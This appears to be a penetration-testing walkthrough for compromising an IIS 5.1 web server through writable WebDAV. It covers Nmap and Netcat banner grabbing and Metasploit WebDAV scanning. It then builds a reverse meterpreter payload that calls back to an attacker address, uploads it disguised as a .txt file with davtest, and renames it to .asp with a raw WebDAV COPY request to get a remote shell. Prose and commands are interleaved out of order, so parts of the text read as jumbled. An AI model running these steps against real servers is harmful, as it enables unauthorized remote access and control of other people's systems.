PORT STATE SERVICE VERSIONJust to verify the results, I'll use Netcat to grab the banners off the box. It also verifies what Nmap reported.
80/tcp open http Microsoft IIS webserver 5.1
#nc 1.1.1.1 80 -vv
(UNKNOWN) [1.1.1.1] 80 (www) openOnce we are reasonably confident in our findings, let's scan for WebDAV. Essentially we want to know if it is present and what capabilities are active.
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
sent 17, rcvd 276
I use Metasploit and its built-in scanning modules for most of my follow-up steps. There are a few auxiliary modules that work brilliantly.
msf > use scanner/http/webdav_website_contentConsidering that the server is filtering certain types of file extensions, we'll need to upload our payload using something safe; in this example I'll use .txt. Before we upload, we'll first need to create the payload so I'll setup a reverse meterpreter payload for Windows using port 1337. Here is how you would create the payload using the built-in Metasploit tools msfpayload and msfencode.
msf auxiliary(webdav_website_content) > set RHOSTS 1.1.1.1
msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (1.1.1.1) http://1.1.1.1/scripts/
msf auxiliary(webdav_website_content) > use scanner/http/webdav_test
msf auxiliary(webdav_test) > set RHOSTS 1.1.1.1
msf auxiliary(webdav_test) > set PATH /scripts
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) has unknown ENABLED
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) Allows Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
[*] 1.1.1.1/scripts (Microsoft-IIS/5.1) Has Public Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
[*] Attempting to create /scriptsWebDavTest_4OpejeyCdj
[*] 192.168.13.203/scripts is WRITEABLE
[*] Checking extensions for upload and execution
[*] Prohibited file types ASP, EXE
cd /pentest/exploits/framework3Now we realize we can't upload .asp files directly to the webserver so we'll get a little tricky. Earlier our WebDAV scans indicated we were able to execute the COPY command so this is where we will use it. Before we move to that, let's get our listener ready.
./msfpayload windows/meterpreter/reverse_tcp LHOST=2.2.2.2 LPORT=1337 R | ./msfencode -o evilpayload.asp
./msfconsoleTo make uploading the file easy, I found a neat tool named davtest which makes the heavy lifting very manageable. The program can be found here. The following syntax will take our meterpreter payload and upload it to the server using a .txt file extension.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 2.2.2.2
set LPORT 1337
exploit
./davtest.pl -url http://1.1.1.1/scripts/ -uploadfile/root/evilpayload.asp -uploadloc evilpayload.asp.txtBrowse to the server's script directory to ensure you see the new .txt file. The last major hurdle to tackle is renaming our file. Here is where we take advantage of the WebDAV COPY function. Netcat into the server and execute the following code.
nc 1.1.1.1 80 -vvAssuming this was successful, simply click on the newly created evilpayload.asp file and a meterpreter shell will be returned in your multi/handler session. In most cases, the limitation will be on local privilege (determined by what privilege IIS is running).
COPY /scripts/evilpayload.asp.txt HTTP/1.1
Host: 1.1.1.1
Destination: http://1.1.1.1/scripts/evilpayload.asp
Overwrite: T
